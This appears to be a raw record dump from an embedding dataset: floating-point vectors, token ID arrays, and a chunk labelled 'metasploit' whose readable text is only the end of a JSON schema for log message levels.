-0.0016615719068795443, 0.26172947883605957, -0.8429790735244751, -0.20071907341480255, -0.3861761689186096, 0.23400938510894775, -0.14752469956874847, 0.18152862787246704, 0.3027925491333008, -0.08515776693820953, -0.12076271325349808, 0.24959902465343475, 0.5535097718238831, -0.6217992305755615, -0.3928956687450409, 0.7078406810760498, 0.5240599513053894, -0.9488085508346558, -0.4426409900188446, 0.23424971103668213, -0.3758920431137085, -0.37342897057533264, 0.02795800194144249, -0.6368963122367859, -0.894706666469574, -0.835593581199646, -0.40439340472221375, -0.5016082525253296, -0.1485576033592224, -0.3088567852973938, 0.42185503244400024, 0.1500837355852127, 0.09049215912818909, 0.7770175337791443, -0.6977218389511108, -0.28466925024986267, -0.6121452450752258, 0.08707421272993088, -0.16039758920669556, -0.011478387750685215, 0.05775136500597, -0.41290369629859924, -0.459886759519577, 1.4818658828735352, -0.5712432265281677, -0.1101311668753624, -0.03806799277663231, -0.4707950949668884, -0.14892536401748657, 0.14185528457164764, 0.29147040843963623, -0.4559878408908844, -0.717305600643158, 0.05903981626033783, 0.25068071484565735, 0.5064190030097961, -0.027471793815493584, 0.3454967141151428, -0.8972271084785461, 0.1371246576309204, -0.07658708095550537, 0.5553821325302124, 0.26726511120796204, -0.6160167455673218, 0.2262803316116333, -0.35687750577926636, -0.5615683197975159, -0.32617947459220886, 0.9320578575134277, 0.022863632068037987, -0.16442839801311493, -1.0508458614349365, 0.23056656122207642, -0.49178844690322876, -0.7127881646156311, 0.6475058197975159, -0.44111397862434387, -0.05565953254699707, 0.05601800978183746, 0.2030586153268814, 0.8774738907814026, -0.6511558294296265, -0.47094017267227173, 0.9143369793891907, 0.29185011982917786, -0.07212114334106445, -0.7477890253067017, 0.6473541259765625, 0.014576997607946396, 0.35846641659736633, 0.280951589345932, 0.326227605342865, 0.19231009483337402, 0.12156035006046295, -0.5287307500839233, -0.22394323348999023, -0.6292753219604492, -0.5686686038970947, 0.5286756753921509, -0.20899170637130737, 1.1646114587783813, 0.4284288287162781, -0.9771328568458557, 0.09335657209157944, 0.2867535352706909, 0.4452686011791229, -0.19328932464122772, 0.057974133640527725, 0.28079313039779663, -0.14688104391098022, 0.17354324460029602, 0.19473868608474731, -0.17349867522716522, -0.18387310206890106, 1.3058619499206543, -0.009134868159890175, -0.5629456639289856, 0.750446617603302, 0.955111026763916, -0.556778609752655, -0.18856306374073029, -0.45188114047050476, -0.32963448762893677, 0.14209719002246857, -0.17113882303237915, 0.16715013980865479, 0.40103235840797424, -0.05966715142130852, -0.22127801179885864, 0.7520610690116882, 0.09729922562837601, 0.25245562195777893, -0.3151838481426239, 0.36720678210258484, -0.22925738990306854, 0.8514313101768494, 0.46276459097862244, -0.6904866099357605, -0.15542644262313843, -0.23323853313922882, 0.3919079005718231, 0.8945662379264832, -0.294214129447937, 1.5601139068603516, -0.23403331637382507, 0.3541925549507141, 0.22785966098308563, -0.026004895567893982, 0.5528222322463989, 0.027643674984574318, -0.4140385389328003, 0.8809932470321655, -0.21062982082366943, -1.1509790420532227, -0.44024524092674255, -0.20515860617160797, 0.1843305081129074, 0.06181718036532402, -0.4337739646434784, -0.38627973198890686, -0.36138272285461426, 0.620602548122406, -0.09334730356931686, -0.6611438989639282, -1.3947714567184448, -0.7830171585083008, -0.18078705668449402, 0.3950449228286743, -0.2791767716407776, 0.29452505707740784, 0.03351985290646553, -0.47061604261398315, -0.48559924960136414, -0.2687273323535919, 0.05251636728644371, -0.4104294776916504, -0.1012621819972992, -0.5615023970603943, 0.4362609386444092, -0.5305107235908508, -0.25287309288978577, -0.369751513004303, 0.2672838866710663, -0.21671703457832336, -0.6128666996955872, -0.16018950939178467, 0.32529380917549133, -0.777213990688324, 1.0428062677383423, -0.11273389309644699, -0.11264871805906296, -0.08416040986776352, -0.17213040590286255, 0.39326012134552, 0.7004455924034119, -0.5286834239959717, 0.34305986762046814, -0.2223801463842392, 0.2665036618709564, 0.3422909677028656, -0.729736328125, 0.26103416085243225, -0.6168431639671326, -0.08802911639213562, 0.5015714764595032, -0.3936540484428406, -0.3511768877506256, -0.31934332847595215, -0.10919208079576492, -0.43679869174957275, -0.2574768662452698, -0.45143234729766846, 0.5955108404159546, -0.0982917845249176, -0.5575048923492432, 0.6324944496154785, 0.38975122570991516, 0.9330669045448303, 0.850807249546051, -1.289645791053772, 0.368838369846344, 0.33960968255996704, -0.2625492513179779, 0.5363374948501587, 0.5615042448043823, 0.601649820804596, -0.24555112421512604, 0.24641938507556915, 0.3919357657432556, -0.693281352519989, 0.1521179974079132, -0.31972891092300415, -0.18321600556373596, -0.07520837336778641, 0.282211035490036, -0.025909481570124626, -0.0018028682097792625, 0.745366096496582, 0.02433142066001892, 0.017087597399950027, -0.34256938099861145, -0.2827993333339691, 0.03566440939903259, -0.9262405633926392, -0.42619219422340393, 0.30057233572006226, -0.6600869297981262, -0.14541392028331757, -0.5326701998710632, -0.9229900240898132, -0.12832720577716827, -0.040249574929475784, 0.06078067049384117, 0.428946316242218, 0.36195170879364014, 0.1497228741645813, 0.9284963011741638, -1.2658861875534058, -0.2683711349964142, -0.021741220727562904, 0.1428411304950714, -0.8879162669181824, -1.0327829122543335, 0.02071157470345497, 0.3344000279903412, 0.5336246490478516, -0.1699446439743042, -1.2983630895614624, 0.2947806715965271, 0.43618983030319214, 0.29067257046699524, 0.1148265153169632, 0.21544131636619568, -0.3650112748146057, 0.8195725083351135, -0.3741523027420044, 0.2239476591348648, -0.3119974434375763, 0.47278597950935364, 0.9736811518669128, 0.17641575634479523, -0.7962148785591125, 0.5103331804275513, 0.21853767335414886, 0.18130123615264893, 0.5539990067481995, 0.19695252180099487, 0.17433688044548035, -0.32108256220817566, 0.15036897361278534, 0.49059322476387024, 0.33499452471733093, 0.025798046961426735, 0.1133381649851799, 0.07607793062925339, 0.09419507533311844, 0.6390230059623718, -0.7680942416191101, 0.023912133648991585, 0.25464949011802673, 0.23797479271888733, -0.22106748819351196, 0.07609396427869797, -0.6677307486534119, 0.2453193962574005, 0.2758830189704895, -0.5674238204956055, 0.05115628242492676, 0.13641777634620667, -0.24664504826068878, 0.4144349694252014, -0.031089477241039276, 0.8324339389801025, -0.38874679803848267, 0.04403424635529518, -0.4939248263835907, 0.377612441778183, -0.17606376111507416, -0.25870949029922485, -0.04178120568394661, 0.432223916053772, 0.9907540082931519, 0.23096856474876404, -0.2296326607465744, 0.640788733959198, -0.11508651822805405, 0.6802454590797424, -0.17502938210964203, 0.05060742422938347, -0.29352867603302, 0.2325507402420044, -0.13806505501270294, -0.804233968257904, -0.34551382064819336, 0.5971513986587524, -0.14920561015605927, -0.16716082394123077, -0.18109361827373505, -0.21238617599010468, -0.024545038118958473, -0.2688744366168976, 0.211382657289505, 0.01983240619301796, -0.3628610372543335, 0.7404035329818726, -0.18834847211837769, -0.5027784109115601, 0.5207580924034119, -0.08813928067684174, 1.0492407083511353, 0.2465330809354782, 0.7872580289840698, -0.17278362810611725, 0.3509308397769928, 0.06280249357223511, 0.08680061995983124, -0.4404181241989136, 0.05166597291827202, 0.4408448040485382, -0.20608200132846832, 0.7510334253311157, -0.7021867632865906, 0.4696691334247589, 0.30636969208717346, -0.47940924763679504, -0.31743383407592773, -0.09910733997821808, -0.36592578887939453, -0.20777109265327454, 0.22718636691570282, 0.22156377136707306, -0.536579430103302, -0.18702185153961182, 0.5934814214706421, 0.14206136763095856, 0.5161116719245911, -0.2278352826833725, -0.3751029670238495, -0.7469894886016846, 0.16142809391021729, -0.7066433429718018, 1.443010926246643, 0.24684357643127441, -0.7593839764595032, -0.055846214294433594, -1.0094976425170898, -0.5709726214408875, -0.03857586532831192, 0.11786961555480957, -0.2857644259929657, 0.09323892742395401, 0.4722853899002075, 0.685283899307251, 0.23226286470890045, -0.49335646629333496, -0.6685472130775452, -0.16824327409267426, 0.8269777894020081, -0.09817560762166977, 0.9390749931335449, 0.30738598108291626, -0.4568644165992737, 0.08581958711147308, -0.2719079256057739, 0.2773229777812958, -0.553958535194397, 0.10816250741481781, -0.44404730200767517, -0.05733845382928848, -0.7517080307006836, -0.11342303454875946, 0.24584181606769562, -0.035362839698791504, 0.19877409934997559, -0.34272855520248413, -0.5119823813438416, -0.21080021560192108, -0.7465127110481262, 0.1761227548122406, 0.14669272303581238, -0.14890369772911072, 0.30494704842567444, 0.1565186232328415, 0.7214362025260925, -0.7881784439086914, 4.293841361999512, 1.4309111833572388, 0.0032731250394135714, 0.09735614061355591, 0.681701123714447, 0.16668617725372314, 0.870770275592804, 0.06176373362541199, 0.4264906644821167, -0.75934898853302, 0.10453451424837112, -0.11813760548830032, 0.26983964443206787, 0.8965524435043335, 0.29964542388916016, 0.245005264878273, -0.11849705874919891, -0.32752224802970886, 0.12997213006019592, -0.24295783042907715, -0.7271857857704163, -0.49732232093811035, -0.20257721841335297, 1.259208083152771, 0.527546763420105, -0.5751644968986511, -0.06038334593176842, -0.9991211891174316, -0.32292765378952026, -0.14481616020202637, 0.17962704598903656, -1.1511958837509155, 0.2560614049434662, -0.6086599826812744, -1.0685323476791382, -0.2904714047908783, 0.5856326222419739, -1.016017198562622, -0.3533719480037689, -0.23788969218730927, -0.2993665933609009, 0.28192245960235596, -0.13490593433380127, -0.7882566452026367, 0.11631939560174942, 0.3428914546966553, 0.04625263065099716, 0.7420892715454102, 0.6281815767288208, -1.1195979118347168, 0.6698152422904968, 0.2424161434173584, 1.323365569114685, 0.10268217325210571, -0.21040567755699158, 0.04345698282122612, 0.7078980803489685, -0.6201717257499695, 0.3463909924030304, -0.29441601037979126, -0.04960694909095764, -0.1956721544265747, 0.4164668321609497, 0.3827861547470093, -0.2952020466327667, -0.10531818866729736, -0.43000656366348267, 0.20890866219997406, 0.2567380964756012, -0.3813101053237915, -0.3601308763027191, -0.09483078867197037, 0.01371264923363924, -0.0564020611345768, 1.1897196769714355, -0.26351016759872437, -0.4781590402126312, 0.21432125568389893, 0.1940736621618271, -0.5157818794250488, -0.5839294791221619, -0.8852565288543701, -0.6551668047904968, 0.007684457581490278, 0.7417904734611511, 0.75031578540802, -0.5305955410003662, -0.4366571307182312, -0.22658845782279968, 0.3916887938976288, 0.17935338616371155, 0.3850958049297333, 0.09111323952674866, 0.46811968088150024, 0.4618537425994873 ]
[ 4842, 7368, 1000, 1024, 1063, 1000, 1034, 1031, 1034, 1027, 1033, 1008, 1002, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 2828, 1000, 1010, 1000, 6412, 1000, 1010, 1000, 3223, 1000, 1010, 1000, 12398, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 3223, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 22017, 20898, 1000, 1065, 1010, 1000, 12398, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1031, 1000, 19701, 1000, 1010, 1000, 5164, 1000, 1010, 1000, 2193, 1000, 1010, 1000, 22017, 20898, 1000, 1010, 1000, 4874, 1000, 1010, 1000, 9140, 1000, 1033, 1065, 1010, 1000, 6412, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 2828, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1065, 1065, 1065, 1065, 3433, 1063, 1000, 1002, 8040, 28433, 1000, 1024, 1000, 8299, 1024, 1013, 1013, 1046, 3385, 1011, 8040, 28433, 1012, 8917, 1013, 8040, 28433, 1001, 1000, 1010, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 1046, 3385, 14536, 2278, 1000, 1010, 1000, 8909, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 1016, 1012, 1014, 1000, 1033, 1065, 1010, 1000, 8909, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 2765, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 4471, 1000, 1033, 1000, 5144, 1000, 1024, 1063, 1000, 4471, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 2709, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1065, 1010, 1000, 7561, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 4471, 1000, 1010, 1000, 3642, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 4471, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 3642, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 2193, 1000, 1065, 1010, 1000, 2951, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1065, 1065, 1065, 1065, 1065, 4471, 17048, 9031, 1011, 2053, 3433, 1063, 1000, 1002, 8040, 28433, 1000, 1024, 1000, 8299, 1024, 1013, 1013, 1046, 3385, 1011, 8040, 28433, 1012, 8917, 1013, 8040, 28433, 1001, 1000, 1010, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 11498, 5244, 1000, 1010, 1000, 4118, 1000, 1010, 1000, 1046, 3385, 14536, 2278, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 1016, 1012, 1014, 1000, 1033, 1065, 1010, 1000, 4118, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 4471, 1000, 1033, 1065, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 2504, 1000, 1010, 1000, 4471, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000 ]
metasploit
119.txt
3
error ", " good ", " warning ", " info ", " debug " ] }, " message " : { " type " : " string " } } } } } [SEP]
[ -0.3575766086578369, -0.5360794067382812, 0.0011593622621148825, 0.4481836259365082, -0.9053530693054199, -0.8467212915420532, 0.379088431596756, 0.20351792871952057, 0.636350691318512, 0.447537362575531, 1.0282468795776367, -0.1467069536447525, 0.5673023462295532, -0.08147747069597244, -1.1538408994674683, 0.06291645020246506, -0.2873130440711975, -0.5305752754211426, -0.6773905754089355, 0.41662582755088806, 0.13052688539028168, 0.31900596618652344, -1.4533175230026245, 0.5032723546028137, -0.9240459203720093, 1.0941637754440308, 0.2966790795326233, 0.1510782241821289, 1.1617989540100098, 1.0601544380187988, -0.6068835258483887, -0.002258830703794956, 0.017540467903017998, -0.5325560569763184, -0.4705309271812439, -0.4503619074821472, 0.5905468463897705, -0.30347129702568054, 0.0021749697625637054, -0.4920334815979004, 0.35038045048713684, -0.6099872589111328, 0.7938162088394165, -0.874618649482727, -1.2444050312042236, -0.835985541343689, 0.608232319355011, -0.13846229016780853, -0.05778946354985237, -0.967730700969696, 0.48162227869033813, 0.08926452696323395, 0.9432624578475952, -0.4308374524116516, -0.21517495810985565, -0.12113403528928757, -0.5541557669639587, 0.8345975875854492, -0.5942421555519104, 0.09768398851156235, -0.37747830152511597, 0.37635374069213867, 0.0338156558573246, -0.8033536672592163, 0.38465750217437744, -0.16103798151016235, -0.2473720908164978, 0.0716240182518959, -0.24341648817062378, -0.22275274991989136, -0.9655558466911316, 0.7094525694847107, -0.7115947008132935, -0.8882835507392883, -0.8549211621284485, 0.2591565251350403, -0.007533560506999493, 0.4731743335723877, -0.9969863891601562, 0.4691492021083832, -0.5988641381263733, 0.8451859951019287, 0.5737890005111694, -0.15193752944469452, -0.7053048610687256, -0.12182093411684036, -0.37404394149780273, 0.0444176122546196, 0.18910714983940125, -0.025829989463090897, -0.26302650570869446, 0.684788703918457, -0.16467708349227905, -0.3297191560268402, 1.0116677284240723, 0.6154125928878784, 0.305255264043808, 0.5238682627677917, -0.6027252078056335, 0.3027059733867645, 0.4226842224597931, 0.5674251914024353, -0.16893231868743896, 0.60671067237854, -0.480854332447052, 0.33774712681770325, 0.8081963062286377, 0.6662853360176086, -1.111390471458435, -0.7299517393112183, -0.02451123669743538, -0.07207568734884262, 0.7281920313835144, -0.5927008986473083, -0.665857195854187, 1.0092371702194214, -0.2958378195762634, 0.1411386877298355, -0.2714412808418274, -0.031781505793333054, 0.2949391007423401, -0.13448981940746307, 0.4127126932144165, -0.9296411871910095, -0.40734991431236267, -0.17157302796840668, 0.5903938412666321, 1.2017463445663452, -0.21351905167102814, 0.24260510504245758, -0.34052810072898865, 0.3437071442604065, 0.7351407408714294, 0.23465849459171295, -0.0859605073928833, -0.3063644468784332, 0.4756702780723572, 0.22585096955299377, 0.04963073879480362, -0.31309711933135986, 0.33221328258514404, 0.020689547061920166, -0.23385421931743622, 1.4995734691619873, -0.7006826996803284, 0.9037841558456421, 0.1160363033413887, -0.14506565034389496, -0.3348740339279175, 0.6714576482772827, -0.3780241310596466, 0.13759873807430267, 0.26000654697418213, 0.3870902359485626, -0.20942065119743347, 0.10900936275720596, -0.08811960369348526, 0.19605682790279388, 1.161768913269043, 0.13111014664173126, -0.07288122922182083, 0.7731585502624512, -0.28814345598220825, 0.7384256720542908, -0.3493136167526245, 0.6039889454841614, -0.9764731526374817, -0.41376185417175293, 0.029784414917230606, -0.35390302538871765, 0.7641765475273132, 0.3142058253288269, -0.14638294279575348, 0.3940478563308716, 1.0175395011901855, -0.13403593003749847, 0.02802123688161373, 0.32196351885795593, 0.48445606231689453, 0.8790318965911865, -0.07343965023756027, 0.7340574264526367, 0.6680019497871399, 0.3018927276134491, -0.4706394076347351, -0.22518201172351837, -0.3799950182437897, -0.042123496532440186, -0.724683403968811, -0.6714178323745728, 0.3998291492462158, -0.09873497486114502, -0.300567626953125, 0.15128926932811737, -0.008465413004159927, -0.019164443016052246, -1.061010718345642, 0.3591057062149048, -0.35381436347961426, -1.4076460599899292, -0.6243082284927368, 0.3879362642765045, -0.17738977074623108, 0.48703500628471375, 0.0014815967297181487, -0.6380553841590881, 0.16973187029361725, 0.6344655752182007, 0.0453985221683979, 0.5859721899032593, 0.15642322599887848, -0.0071280337870121, -0.46675246953964233, 0.254081130027771, 0.0701947957277298, -0.7428804636001587, -0.2829740047454834, 1.11661958694458, -0.32808464765548706, 0.4195420444011688, -0.2935572564601898, 0.8030892610549927, 0.4778429865837097, 0.23537728190422058, 0.005736761260777712, -0.21494220197200775, 0.22910182178020477, 0.871778130531311, 0.4726734757423401, -0.298554390668869, 0.2885209023952484, 0.908735454082489, 0.3673100769519806, 0.8202994465827942, 0.10008014738559723, 0.3859228193759918, 1.0833938121795654, 0.7895320653915405, 0.13437500596046448, 0.2391829490661621, -0.5520561933517456, 0.46607914566993713, -0.09987210482358932, -0.3138863146305084, -0.38658833503723145, -0.4512232840061188, 0.6086893081665039, -0.4163787066936493, 0.030209297314286232, 0.5615992546081543, -0.5848308801651001, 1.1211045980453491, 0.8739507794380188, 0.08887732774019241, -1.0506534576416016, -0.8600144386291504, 0.0110875703394413, 1.0862916707992554, -1.0338231325149536, 0.6111966371536255, 0.5047467350959778, 0.7273595929145813, 0.1265288144350052, 0.2487725466489792, 0.5136397480964661, 0.4343716502189636, 0.4337916970252991, -0.2978799045085907, -0.558830201625824, -0.8810810446739197, -0.4461057186126709, -0.5080869197845459, -0.15755458176136017, 0.2561342120170593, -0.590064287185669, 0.08726193010807037, 0.7113295793533325, -1.0060380697250366, 0.51848965883255, 0.1253051906824112, -0.12146822363138199, -0.5052477121353149, -0.18766272068023682, 0.07237675786018372, -0.12340674549341202, 0.00731333252042532, -0.32758399844169617, 0.5287788510322571, -0.325284868478775, 0.6833729147911072, -0.3604661822319031, -0.824737012386322, 0.03884927183389664, -0.5093159079551697, 0.2927645742893219, -0.5230880379676819, 0.04290986433625221, -0.3598399758338928, -0.3675874173641205, -0.5533583760261536, -0.7800089716911316, -0.5395992398262024, -0.9127709865570068, 0.17897489666938782, -0.9226584434509277, 0.7257248163223267, 0.47801443934440613, 0.270439088344574, 0.5595946311950684, 1.0941035747528076, -0.10605127364397049, 0.3679392635822296, 0.5524042248725891, 0.037974268198013306, -0.935987651348114, 0.3167817294597626, 0.3302454352378845, 0.2275792956352234, -0.5082752108573914, 0.20009203255176544, -0.8214147090911865, 0.5102807879447937, -0.13335980474948883, -0.6879468560218811, -0.27087467908859253, 0.5353708863258362, 0.8879635334014893, -1.5112571716308594, 0.9052094221115112, -0.45600131154060364, -0.7869727611541748, 0.06954199075698853, -0.06306970864534378, 0.41569507122039795, 0.5760577917098999, 0.3819648027420044, -0.08602277934551239, -0.7374567985534668, 0.14524318277835846, 0.29780787229537964, 0.4078315198421478, 0.04394509643316269, 0.045278944075107574, 0.40577155351638794, -0.885003924369812, 0.5197739005088806, 0.2376076877117157, -0.07797396183013916, 0.00953877903521061, 0.043091319501399994, -0.3818405568599701, -0.06189020350575447, -0.05926985666155815, 0.6125473380088806, 0.557097315788269, 0.8448237776756287, -0.34140780568122864, 0.05816475301980972, 0.6022558808326721, 0.09223045408725739, 0.32967785000801086, -0.12987329065799713, 0.04429280385375023, -0.6518714427947998, -0.09700069576501846, -1.2673695087432861, 0.20008116960525513, 0.25027722120285034, 0.6253679394721985, -0.022040817886590958, 0.9128556251525879, -1.0987662076950073, -0.6725825071334839, 0.6931978464126587, -0.6078798174858093, 0.14061202108860016, 1.445104956626892, -0.5216223001480103, 1.0803778171539307, -0.41201499104499817, 0.02669895999133587, -0.12019944190979004, 0.734774112701416, 0.9626604318618774, 0.5665742754936218, 0.2658238112926483, -0.22235755622386932, 0.2735326588153839, -0.7078855037689209, -0.17969514429569244, -0.48014646768569946, -0.6532344818115234, 0.6054236888885498, -0.5521972179412842, -0.35467174649238586, -1.1134765148162842, 0.09614566713571548, 0.6988354325294495, 0.632415235042572, 0.2168521285057068, 0.33028876781463623, 0.076956607401371, -0.16255144774913788, 0.24456846714019775, -0.30244719982147217, 0.04744550585746765, -0.3558407425880432, -0.09539756178855896, -0.2827339768409729, 0.21594929695129395, -0.44659674167633057, -0.3640325665473938, -0.7394514679908752, 0.4432019889354706, -0.30544477701187134, 0.29364100098609924, -0.7343716025352478, 0.47129085659980774, 0.4312210977077484, -0.36306604743003845, -0.03960783779621124, -0.21362517774105072, -0.14677587151527405, 0.6618618369102478, 0.13493390381336212, -0.39109665155410767, 0.1242978498339653, -0.38273489475250244, 0.782077431678772, 0.7741407155990601, -0.0692794993519783, -0.4285116195678711, -0.8762413263320923, -0.6794784069061279, -0.7137374877929688, 0.2801094949245453, 0.8906587362289429, -0.7975387573242188, 0.6145090460777283, -1.273192286491394, 0.00432544993236661, 0.3567952513694763, -0.21375830471515656, -0.08560175448656082, -0.5237022638320923, 0.1421162635087967, 0.2577706575393677, -0.15746261179447174, -0.5171605348587036, -0.7374671101570129, 0.6356193423271179, -0.6134662628173828, 0.2719784080982208, -0.9891015887260437, -0.42834189534187317, -0.028011193498969078, 0.10991694033145905, -0.10783187299966812, 0.029227564111351967, -0.41530537605285645, 0.30688050389289856, -0.03764805570244789, 0.020023822784423828, -0.5033275485038757, -0.1269819289445877, 1.4120389223098755, -0.0312914103269577, -0.7260624170303345, 0.8809322118759155, -0.037308644503355026, -0.07021108269691467, 0.06594455242156982, 0.3703266680240631, -0.056346215307712555, 0.4867996573448181, -0.7733292579650879, -0.1675843894481659, -0.7080150246620178, -0.9384411573410034, -0.3823958933353424, -0.742734968662262, 0.6904902458190918, -0.3221522271633148, -0.5100057125091553, -0.4625331461429596, -1.0704962015151978, -0.5378566980361938, 0.08681722730398178, -0.1600477695465088, -0.23508676886558533, -0.07215788960456848, 0.377174437046051, 0.5061229467391968, -0.5281606316566467, -0.8690570592880249, 0.12446536868810654, -0.2737235426902771, -0.6050199270248413, 0.03935591131448746, 0.34253430366516113, 0.8294015526771545, -0.4414603114128113, -0.7767730355262756, 0.21733376383781433, -0.030884243547916412, 0.254269003868103, -0.2225695103406906, 0.01542904693633318, 0.12803171575069427, 0.7675961852073669, -0.6501270532608032, 0.7743963599205017, -0.3046500086784363, -0.2763304114341736, 0.2748567461967468, -0.3170911371707916, 0.4292309880256653, 0.05004025623202324, -0.9483348727226257, 0.695366621017456, 0.21048466861248016, -0.4614851474761963, -0.633852481842041, 0.46115952730178833, -0.15094974637031555, 0.9645456075668335, 0.2838965356349945, -0.24029618501663208, -0.6611419320106506, -0.8125519156455994, 0.1754939705133438, -0.18282273411750793, -0.15575096011161804, -1.3644627332687378, 0.32745373249053955, 0.011275919154286385, -0.2646879255771637, 0.06863120198249817, -0.6786409616470337, -0.27307233214378357, -0.6216027140617371, 0.3283904790878296, 0.20082750916481018, -0.6269422769546509, 0.12955303490161896, 0.31536856293678284, -0.7031468152999878, 2.0759546756744385, -0.5119994878768921, -0.01944676972925663, -0.3072492480278015, -0.12203565239906311, 0.04308274760842323, 0.5908758640289307, 0.16504760086536407, -0.18148799240589142, -0.4644075930118561, 0.5236747860908508, 0.44818684458732605, -0.26686611771583557, -0.6534302234649658, 0.3338412642478943, -1.3677669763565063, -0.3484136760234833, 0.19193825125694275, 0.34356921911239624, 0.4375813603401184, -0.053653694689273834, 0.45027801394462585, -0.7960953116416931, -0.24030379951000214, -0.2607010304927826, 0.6918995380401611, 0.5586426854133606, -0.5461024045944214, -1.2670094966888428, -0.49468615651130676, -1.4917253255844116, -0.7018561959266663, 0.34784984588623047, 0.011704236268997192, -0.10323342680931091, -0.12839753925800323, -0.1609506905078888, 0.8090152144432068, -0.6803926825523376, 0.822963297367096, 1.0054954290390015, 0.10606671124696732, -0.5670226812362671, -0.2047407627105713, 0.5537508130073547, 0.7737497687339783, -0.33098742365837097, -0.6470972895622253, 1.0946269035339355, -0.5602235198020935, -0.7393498420715332, -0.8924029469490051, -0.3933241665363312, -0.8755176663398743, -0.9177749752998352, 1.7599177360534668, 0.1416660100221634, 0.6678686141967773, 0.8547880053520203, -0.7464428544044495, -0.8817700743675232, 0.5188581943511963, 0.24043631553649902, -0.2676827609539032, 0.9148659110069275, 0.4279598295688629, 0.1368715912103653, 0.7673617601394653, -0.34464091062545776, 0.2015024870634079, -0.11332538723945618, 1.0513975620269775, -0.3958674371242523, -0.5786229372024536, -0.03522273898124695, 0.42943212389945984, -0.13922326266765594, -0.3630429804325104, -0.41916683316230774, -0.6919268369674683, -0.16665883362293243, -0.5828855037689209, 0.34496355056762695, -0.6215353608131409, -0.09305033832788467, -0.5510817766189575, -0.19100436568260193, 0.7427932024002075, 0.22438888251781464, 0.3894134759902954, 0.27925577759742737, -0.27501192688941956, 0.16128721833229065, 0.9262546300888062, -0.6136863827705383, 0.30088338255882263, -1.2681623697280884, 0.0530506893992424, -0.2016581892967224, -0.7349188923835754, 1.4095821380615234, 0.014392603188753128, 0.4982839524745941, 0.46311548352241516, -0.3249395191669464, 0.5532395243644714, -0.35242849588394165, -0.4112984836101532, 1.1964062452316284, -0.7118008732795715, -0.2434191256761551, 0.05415841192007065, -0.09895011782646179, -0.22365930676460266, 0.1475883573293686, 0.1653919816017151, 0.046531468629837036, -0.01659858226776123, 0.21660202741622925, -0.11007917672395706, -0.6671648621559143, 0.27693167328834534, -1.401553988456726, -0.05495113879442215, -0.6582323908805847, -0.8752594590187073, -0.4026183485984802, 0.029673011973500252, -0.4536890983581543, -0.0375063382089138, -0.4324246048927307, 0.5135741233825684, -0.23388583958148956, 1.2284272909164429, -0.3858834505081177, 0.140233114361763, -0.6083856821060181, -0.13423608243465424, -1.2679548263549805, -0.07706475257873535, -0.009059763513505459, -0.7501111626625061, -0.23702168464660645, -0.29660725593566895, -0.571876049041748, 1.1192240715026855, 0.4412010908126831, 0.6235087513923645, -0.7961360216140747, -0.09224078059196472, 0.5618268251419067, -0.13275521993637085, 0.05390634760260582, 0.348275750875473, 0.23434416949748993, 0.09725268930196762, -0.19410349428653717, 0.099399134516716, 0.2592000365257263, -0.6513928174972534, -0.3831443190574646, 0.6156538128852844, -0.06092275679111481, -0.1328611820936203, -0.735670268535614, -0.09362231940031052, -0.6363908052444458, -0.07439450174570084, -0.27742695808410645, 0.12425842881202698, 0.3977585434913635, -0.27368447184562683, -0.03811826929450035, 0.8253148198127747, 0.4059832990169525, 0.7466129660606384, -0.7146469950675964, 0.5857805609703064, 0.16187554597854614, 0.17035408318042755, 0.6868095397949219, -0.0798613429069519, 0.3913184106349945, -0.46370112895965576, 0.5018176436424255, -0.10808369517326355, 0.1520170271396637, -0.1561281532049179, -0.35386785864830017, -0.5586645007133484, -0.6946430802345276, 0.012804967351257801, 0.43988609313964844, 0.1499592512845993, 0.3729843497276306, 0.22546042501926422, 0.1190304383635521, -0.01572158932685852, 0.24173735082149506, 0.8507072329521179, -0.7688704133033752, -0.5768911242485046, 0.5101262927055359, 0.24304567277431488, -0.10176141560077667, -0.8632579445838928, -0.9554022550582886, -0.8605285882949829, 0.16735976934432983, 0.02652015909552574, 0.47231602668762207, 0.7713807821273804, 0.44907525181770325, 0.5753744840621948, -1.176510214805603, 0.31897419691085815, -0.22699688374996185, 0.6767853498458862, -0.5131739974021912, -0.3019542694091797, 1.0600024461746216, 0.049255162477493286, -0.30815035104751587, 0.14145883917808533, -0.267645001411438, 0.26297256350517273, -0.22291699051856995, -0.22224852442741394, -0.03066442348062992, -0.4765802323818207, 